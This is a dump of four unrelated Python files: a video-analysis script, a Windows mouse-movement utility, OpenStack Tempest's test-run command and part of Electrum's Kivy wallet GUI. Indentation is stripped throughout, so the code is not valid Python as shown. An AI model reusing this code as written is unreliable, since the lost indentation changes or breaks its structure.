for file in glob.glob(DIRIMG+"*"):
os.remove(file)
for file in glob.glob(DIRVID+"*"):
os.remove(file)
syncQueue = Queue()
foundQueue = Queue()
# analyzed time (seconds from the start of the video)
segmentTime = STARTAT
# number of running processes
nProcess = 0
# start a process that blocks waiting on the foundQueue
# and selects the images it receives
pAnalyseLesFound = Process(target=analyse_les_found, args=(foundQueue,))
pAnalyseLesFound.start()
while True:
# check the video duration
duration = videoLength()
# while there is video left to process (duration > segmentTime)
# - wait for a worker to become free
# - process segments
while duration > segmentTime + timeStep:
if nProcess >= MAXPROCESS:
out = syncQueue.get()
nProcess -= 1
# HERE we launch a process
#analyse_video(syncQueue,segmentTime,deltaT,foundQueue)
p = Process(target=analyse_video, args=(segmentTime, syncQueue, foundQueue,))
p.start()
nProcess += 1
# move on to the next step
segmentTime += timeStep
# maximum duration check
if MAXLENGTH > 0:
if segmentTime >= STARTAT + MAXLENGTH:
break
# time marker at regular intervals
if segmentTime % (5*60) < timeStep:
print(formate_le_temps(segmentTime))
# once all segments have been processed
# - if we are not on a live stream, process the last segment
# - if we are on a live stream, loop
if not isLive: break
if MAXLENGTH == 0:
p = Process(target=analyse_video, args=(segmentTime, syncQueue, foundQueue,))
p.start()
nProcess += 1
# wait for the video analysis processes
while nProcess > 0:
out = syncQueue.get()
nProcess -= 1
# shut down the found-analysis process
foundQueue.put((0,0,0))
pAnalyseLesFound.join()
# we are done!
totalTime = time.time() - STARTTIME
print("\n")
print("Temps écoulé: %.1f" % (totalTime))
print("Temps analysé: %.1f" % (duration))
print("Efficacité: %.1fx" % (duration / totalTime))
#####################################################################
#####################################################################
def processImages():
foundQueue = Queue()
images = glob.glob(DIRIMG+"death_*."+IMGEXT)
# start a process that blocks waiting on the foundQueue
# and selects the images it receives
pAnalyseLesFound = Process(target=analyse_les_found, args=(foundQueue,))
pAnalyseLesFound.start()
for fichierImage in images:
match = re.search(r"death_(\d+)_(\d+)\."+IMGEXT,fichierImage)
segmentTime = int(match.group(1))
print(".",end="")
analyse_image(foundQueue,segmentTime,fichierImage)
foundQueue.put((0,0,0))
pAnalyseLesFound.join()
allTheFound = foundQueue.get()
print("\nOn a trouvé %d morts !!" % (len(allTheFound)))
#####################################################################
#####################################################################
if __name__ == '__main__':
# workaround for the macOS Python bug
atexit.register(restoreCommandLine)
# select images / stream / video depending on the parameters
# images: sort the found images
# - move them to deaths
# - delete from found? or what?
# stream: parse the stream
# video: stop at the end of the video
parser = argparse.ArgumentParser()
parser.add_argument('--numsession', '-n', help='Session number (VOD number)') # required=True
parser.add_argument('--images', '-i', action='store_true', help='Analyze the images instead of the video')
parser.add_argument('--video', '-v', action='store_true', help='Analyze a fixed video rather than the stream')
parser.add_argument('--upload', '-u', action='store_true', help='Upload the captured images to the website')
parser.add_argument('--uploadurl', help='URL of the file upload script')
parser.add_argument('--uploadkey', help='Security key for the upload script')
parser.add_argument('--procs', '-p', help='Maximum number of processes (typically 1-8)')
parser.add_argument('--step', '-s', help='Step length (in seconds)')
parser.add_argument('--maskdir', '-m', help='Directory containing the mask data')
parser.add_argument('--dir', help='Root directory for temporary and output files')
parser.add_argument('--source', help='Path to the source video file')
parser.add_argument('--format', help='Timestamp format for the file names (HMS)')
parser.add_argument('--startat', help='Starting point of the analysis (in seconds)')
parser.add_argument('--length', help='Stop after analyzing this duration')
parser.add_argument('--addtime', help='Time to add to the counter when creating files')
parser.add_argument('--nodelete', action='store_true', help='Do not delete temporary files')
parser.add_argument('--diagnos', action='store_true', help='Display diagnostic messages')
parser.add_argument('--debug', action='store_true', help='Create additional temporary files')
parser.add_argument('--png', action='store_true', help='Generate captures as PNG (jpg by default)')
args = parser.parse_args()
#
try:
if int(args.procs) > 0:
MAXPROCESS = int(args.procs)
except:
pass
#
try:
if int(args.step) > 0:
timeStep = int(args.step)
except:
pass
#
try:
if int(args.length) > 0:
MAXLENGTH = int(args.length)
except:
pass
#
try:
if int(args.addtime) > 0:
TIMERADD = int(args.addtime)
except:
pass
#
if args.upload:
UPLOADFILES = True
#
if args.uploadurl:
UPLOADURL = args.uploadurl
#
if args.uploadkey:
MAGICKEY = args.uploadkey
#
if args.maskdir:
init_res(args.maskdir)
else:
init_res()
#
if args.numsession:
NUMVID = args.numsession
#
if args.dir:
if os.path.exists(args.dir):
DIR = args.dir
if DIR[-1:] != "/":
DIR = DIR + "/"
init_dirs()
#
if args.source:
SOURCE = args.source
#
if args.nodelete:
DELETE = False
#
if args.diagnos:
DIAGNOS = True
#
if args.debug:
DEBUG = True
#
if args.png:
IMGEXT = "png"
#
if args.format:
FORMATNOM = args.format
#
startat = 0
if args.startat:
mat = re.match(r'(\d+)h(\d+)m(\d+)s',args.startat)
if mat:
STARTAT = int(mat.group(1))*60*60+int(mat.group(2))*60+int(mat.group(3))
else:
try:
if int(args.startat) >= 0:
STARTAT = int(args.startat)
except:
pass
# TODO: check that DIR exists / create the subdirectories
#
if args.images:
processImages()
elif args.video:
processStream(isLive = False)
else:
processStream(isLive = True)
|
mouse_handler.py
|
import datetime
import random
import sys
import threading
import time
import win32api
import win32con
SCREEN_WIDTH = win32api.GetSystemMetrics(0)
SCREEN_HEIGHT = win32api.GetSystemMetrics(1)
class Mouse_Handler:
def __init__(self):
# thread
self.active_thread = None
self.timer_handler_thread = None
# event
self.timer_countdown = None
self.movement_delay = None
def move_mouse(self, ui_input):
"""
Move mouse <offset> away relative to the current position every <delay>
seconds. 65535 is used to normalize absolute coordinates so we can get
the same movement regardless of screen size (0,0) to (65535,65535)
"""
# Initialize movement configuration
delay = ui_input.delay
offset = ui_input.offset
random_movement_enabled = ui_input.random_movement_enabled
random_delay_enabled = ui_input.random_delay_enabled
random_movement = ui_input.random_movement
min_random_movement = int(random_movement[0])
max_random_movement = int(random_movement[1])
random_delay = ui_input.random_delay
min_random_delay = int(random_delay[0])
max_random_delay = int(random_delay[1])
# Initialize random movement and delay modifier
random_x_movement_modifier = 0
random_y_movement_modifier = 0
random_delay_modifier = 0
random_x_direction = 1
random_y_direction = 1
while not self.movement_delay.is_set():
# Check if random movement is enabled
if random_movement_enabled:
random_x_movement_modifier = random.randint(min_random_movement, max_random_movement)
random_y_movement_modifier = random.randint(min_random_movement, max_random_movement)
random_x_direction = random.choice([1, -1])
random_y_direction = random.choice([1, -1])
# Calculate total movement
total_x_movement = (offset + random_x_movement_modifier) * random_x_direction
total_y_movement = (offset + random_y_movement_modifier) * random_y_direction
# Check if random delay is enabled
if random_delay_enabled:
random_delay_modifier = random.randint(min_random_delay, max_random_delay)
# Perform the first movement
x, y = win32api.GetCursorPos()
win32api.mouse_event(
win32con.MOUSEEVENTF_MOVE | win32con.MOUSEEVENTF_ABSOLUTE,
int((x / SCREEN_WIDTH * 65535.0) + (total_x_movement)),
int((y / SCREEN_HEIGHT * 65535.0) + (total_y_movement))
)
self.movement_delay.wait(delay + random_delay_modifier)
# Perform the second movement
x, y = win32api.GetCursorPos()
win32api.mouse_event(
win32con.MOUSEEVENTF_MOVE | win32con.MOUSEEVENTF_ABSOLUTE,
int((x / SCREEN_WIDTH * 65535.0) - (total_x_movement)),
int((y / SCREEN_HEIGHT * 65535.0) - (total_y_movement))
)
self.movement_delay.wait(delay + random_delay_modifier)
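# For illustration of the normalization above: on a 1920x1080 screen a cursor
# at pixel x=960 maps to 960 / 1920 * 65535 ~= 32767 in the 0-65535 range, so
# adding a total_x_movement of 500 moves the absolute x coordinate to ~33267
# (screen size and offset are examples only).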
def start_mouse_movement(self, ui_input):
# Initiate mouse movement
self.movement_delay = threading.Event()
mouse_movement_thread = threading.Thread(target=self.move_mouse, args=(ui_input,))
self.active_thread = mouse_movement_thread
mouse_movement_thread.start()
def stop_mouse_movement(self):
# Stop mouse movement
if self.movement_delay is not None:
self.movement_delay.set()
if self.active_thread is not None:
self.active_thread.join()
if self.timer_countdown is not None:
self.timer_countdown.set()
def start_timer(self, timer, ui):
# Initiate the timer handler and timer display handler
self.timer_handler_thread = threading.Thread(target=self.timer_handler, args=(timer, ui,))
self.timer_handler_thread.start()
self.display_timer_thread = threading.Thread(target=self.display_timer, args=(timer, ui,))
self.display_timer_thread.start()
def display_timer(self, timer, ui):
# Push the current timer value to UI
timer_start_time = time.time()
time_elapsed = 0
self.timer_countdown = threading.Event()
while time_elapsed <= timer and not self.timer_countdown.is_set():
# Update timer display in UI
timer_current_time = time.time()
time_elapsed = int(timer_current_time - timer_start_time)
time_left = timer - time_elapsed
ui.ui.currentTimerValue.setText(str(datetime.timedelta(seconds=time_left)))
def timer_handler(self, timer, ui):
# Start the timer
self.active_thread.join(timer)
self.movement_delay.set()
self.active_thread.join()
ui.stop_mouse_movement()
|
run.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Runs tempest tests
This command is used for running the tempest tests
Test Selection
==============
Tempest run has several options:
* **--regex/-r**: This is a selection regex like what testr uses. It will run
any tests that match on re.match() with the regex
* **--smoke/-s**: Run all the tests tagged as smoke
There are also the **--blacklist-file** and **--whitelist-file** options that
let you pass a filepath to tempest run with the file format being a line
separated regex, with '#' used to signify the start of a comment on a line.
For example::
# Regex file
^regex1 # Match these tests
.*regex2 # Match those tests
The blacklist file will be used to construct a negative lookahead regex and
the whitelist file will simply OR all the regexes in the file. The whitelist
and blacklist file options are mutually exclusive so you can't use them
together. However, you can combine either with a normal regex or the *--smoke*
flag. When used with a blacklist file the generated regex will be combined to
something like::
^((?!black_regex1|black_regex2).)*$cli_regex1
When combined with a whitelist file all the regexes from the file and the CLI
regexes will be ORed.
You can also use the **--list-tests** option in conjunction with selection
arguments to list which tests will be run.
You can also use the **--load-list** option that lets you pass a filepath to
tempest run with the file format being in a non-regex format, similar to the
tests generated by the **--list-tests** option. You can specify target tests
by removing unnecessary tests from a list file which is generated from
**--list-tests** option.
Test Execution
==============
There are several options to control how the tests are executed. By default
tempest will run in parallel with a worker for each CPU present on the machine.
If you want to adjust the number of workers use the **--concurrency** option
and if you want to run tests serially use **--serial/-t**
Running with Workspaces
-----------------------
Tempest run enables you to run your tempest tests from any configured tempest
workspace; it relies on you having set up a tempest workspace with either the
``tempest init`` or ``tempest workspace`` commands. Then, using the
``--workspace`` CLI option, you can specify which one of your workspaces you
want to run tempest from. With this option you don't have to run Tempest
directly with your current working directory being the workspace; Tempest will
take care of managing everything to be executed from there.
Running from Anywhere
---------------------
Tempest run provides you with an option to execute tempest from anywhere on
your system. You are required to provide a config file in this case with the
``--config-file`` option. When run tempest will create a .testrepository
directory and a .testr.conf file in your current working directory. This way
you can use testr commands directly to inspect the state of the previous run.
Test Output
===========
By default tempest run's output to STDOUT will be generated using the
subunit-trace output filter. But, if you would prefer a subunit v2 stream to be
output to STDOUT, use the **--subunit** flag.
Combining Runs
==============
There are certain situations in which you want to split a single run of tempest
across 2 executions of tempest run (for example, to run part of the tests
serially and others in parallel). To accomplish this but still treat the results
as a single run, you can leverage the **--combine** option, which will append
the current run's results to the previous run's.
"""
import io
import os
import sys
import tempfile
import threading
from cliff import command
from os_testr import regex_builder
from os_testr import subunit_trace
from oslo_serialization import jsonutils as json
import six
from testrepository.commands import run_argv
from tempest import clients
from tempest.cmd import cleanup_service
from tempest.cmd import init
from tempest.cmd import workspace
from tempest.common import credentials_factory as credentials
from tempest import config
CONF = config.CONF
SAVED_STATE_JSON = "saved_state.json"
class TempestRun(command.Command):
def _set_env(self, config_file=None):
if config_file:
CONF.set_config_path(os.path.abspath(config_file))
# NOTE(mtreinish): This is needed so that testr doesn't gobble up any
# stacktraces on failure.
if 'TESTR_PDB' in os.environ:
return
else:
os.environ["TESTR_PDB"] = ""
# NOTE(dims): most of our .testr.conf try to test for PYTHON
# environment variable and fall back to "python", under python3
# if it does not exist. we should set it to the python3 executable
# to deal with this situation better for now.
if six.PY3 and 'PYTHON' not in os.environ:
os.environ['PYTHON'] = sys.executable
def _create_testrepository(self):
if not os.path.isdir('.testrepository'):
returncode = run_argv(['testr', 'init'], sys.stdin, sys.stdout,
sys.stderr)
if returncode:
sys.exit(returncode)
def _create_testr_conf(self):
top_level_path = os.path.dirname(os.path.dirname(__file__))
discover_path = os.path.join(top_level_path, 'test_discover')
file_contents = init.TESTR_CONF % (top_level_path, discover_path)
with open('.testr.conf', 'w+') as testr_conf_file:
testr_conf_file.write(file_contents)
def take_action(self, parsed_args):
returncode = 0
if parsed_args.config_file:
self._set_env(parsed_args.config_file)
else:
self._set_env()
# Workspace execution mode
if parsed_args.workspace:
workspace_mgr = workspace.WorkspaceManager(
parsed_args.workspace_path)
path = workspace_mgr.get_workspace(parsed_args.workspace)
if not path:
sys.exit(
"The %r workspace isn't registered in "
"%r. Use 'tempest init' to "
"register the workspace." %
(parsed_args.workspace, workspace_mgr.path))
os.chdir(path)
# NOTE(mtreinish): tempest init should create a .testrepository dir
# but since workspaces can be imported let's sanity check and
# ensure that one is created
self._create_testrepository()
# Local execution mode
elif os.path.isfile('.testr.conf'):
# If you're running in local execution mode and there is not a
# testrepository dir create one
self._create_testrepository()
# local execution with config file mode
elif parsed_args.config_file:
self._create_testr_conf()
self._create_testrepository()
else:
print("No .testr.conf file was found for local execution")
sys.exit(2)
if parsed_args.state:
self._init_state()
else:
pass
if parsed_args.combine:
temp_stream = tempfile.NamedTemporaryFile()
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
regex = self._build_regex(parsed_args)
if parsed_args.list_tests:
argv = ['tempest', 'list-tests', regex]
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
options = self._build_options(parsed_args)
returncode = self._run(regex, options)
if returncode > 0:
sys.exit(returncode)
if parsed_args.combine:
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
returncode = run_argv(['tempest', 'load', temp_stream.name],
sys.stdin, sys.stdout, sys.stderr)
sys.exit(returncode)
def get_description(self):
return 'Run tempest'
def _init_state(self):
print("Initializing saved state.")
data = {}
self.global_services = cleanup_service.get_global_cleanup_services()
self.admin_mgr = clients.Manager(
credentials.get_configured_admin_credentials())
admin_mgr = self.admin_mgr
kwargs = {'data': data,
'is_dry_run': False,
'saved_state_json': data,
'is_preserve': False,
'is_save_state': True}
for service in self.global_services:
svc = service(admin_mgr, **kwargs)
svc.run()
with open(SAVED_STATE_JSON, 'w+') as f:
f.write(json.dumps(data,
sort_keys=True, indent=2, separators=(',', ': ')))
def get_parser(self, prog_name):
parser = super(TempestRun, self).get_parser(prog_name)
parser = self._add_args(parser)
return parser
def _add_args(self, parser):
# workspace args
parser.add_argument('--workspace', default=None,
help='Name of tempest workspace to use for running'
' tests. You can see a list of workspaces '
'with tempest workspace list')
parser.add_argument('--workspace-path', default=None,
dest='workspace_path',
help="The path to the workspace file, the default "
"is ~/.tempest/workspace.yaml")
# Configuration flags
parser.add_argument('--config-file', default=None, dest='config_file',
help='Configuration file to run tempest with')
# test selection args
regex = parser.add_mutually_exclusive_group()
regex.add_argument('--smoke', '-s', action='store_true',
help="Run the smoke tests only")
regex.add_argument('--regex', '-r', default='',
help='A normal testr selection regex used to '
'specify a subset of tests to run')
list_selector = parser.add_mutually_exclusive_group()
list_selector.add_argument('--whitelist-file', '--whitelist_file',
help="Path to a whitelist file, this file "
"contains a separate regex on each "
"newline.")
list_selector.add_argument('--blacklist-file', '--blacklist_file',
help='Path to a blacklist file, this file '
'contains a separate regex exclude on '
'each newline')
list_selector.add_argument('--load-list', '--load_list',
help='Path to a non-regex whitelist file, '
'this file contains a separate test '
'on each newline. This command '
'supports files created by the tempest '
'run ``--list-tests`` command')
# list only args
parser.add_argument('--list-tests', '-l', action='store_true',
help='List tests',
default=False)
# execution args
parser.add_argument('--concurrency', '-w',
help="The number of workers to use, defaults to "
"the number of cpus")
parallel = parser.add_mutually_exclusive_group()
parallel.add_argument('--parallel', dest='parallel',
action='store_true',
help='Run tests in parallel (this is the'
' default)')
parallel.add_argument('--serial', '-t', dest='parallel',
action='store_false',
help='Run tests serially')
parser.add_argument('--save-state', dest='state',
action='store_true',
help="To save the state of the cloud before "
"running tempest.")
# output args
parser.add_argument("--subunit", action='store_true',
help='Enable subunit v2 output')
parser.add_argument("--combine", action='store_true',
help='Combine the output of this run with the '
"previous run's as a combined stream in the "
"testr repository after it finish")
parser.set_defaults(parallel=True)
return parser
def _build_regex(self, parsed_args):
regex = ''
if parsed_args.smoke:
regex = 'smoke'
elif parsed_args.regex:
regex = parsed_args.regex
if parsed_args.whitelist_file or parsed_args.blacklist_file:
regex = regex_builder.construct_regex(parsed_args.blacklist_file,
parsed_args.whitelist_file,
regex, False)
return regex
def _build_options(self, parsed_args):
options = []
if parsed_args.subunit:
options.append("--subunit")
if parsed_args.parallel:
options.append("--parallel")
if parsed_args.concurrency:
options.append("--concurrency=%s" % parsed_args.concurrency)
if parsed_args.load_list:
options.append("--load-list=%s" % parsed_args.load_list)
return options
def _run(self, regex, options):
returncode = 0
argv = ['tempest', 'run', regex] + options
if '--subunit' in options:
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
argv.append('--subunit')
stdin = io.StringIO()
stdout_r, stdout_w = os.pipe()
subunit_w = os.fdopen(stdout_w, 'wt')
subunit_r = os.fdopen(stdout_r)
returncodes = {}
def run_argv_thread():
returncodes['testr'] = run_argv(argv, stdin, subunit_w,
sys.stderr)
subunit_w.close()
run_thread = threading.Thread(target=run_argv_thread)
run_thread.start()
returncodes['subunit-trace'] = subunit_trace.trace(
subunit_r, sys.stdout, post_fails=True, print_failures=True)
run_thread.join()
subunit_r.close()
# python version of pipefail
if returncodes['testr']:
returncode = returncodes['testr']
elif returncodes['subunit-trace']:
returncode = returncodes['subunit-trace']
return returncode
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register a widget cache to keep memory usage down; the timeout is set to
# forever (0) so the data stays cached
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.storage.put('use_change', self.use_change)
self.wallet.storage.write()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key, status):
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment was sent'))
self._trigger_update_history()
elif status == PR_FAILED:
self.show_info(_('Payment failed'))
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
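# Worked example for the conversions above (rate and unit are examples only):
# with base_unit 'mBTC' (decimal_point 5), get_amount('12.5 mBTC') returns
# 1250000 satoshis; with an exchange rate of 10000, btc_to_fiat('12.5') gives
# 1250000 * 10000 / 1e8 = 125.0, formatted as '125'.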
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Screen orientation the app is running in.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating to a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
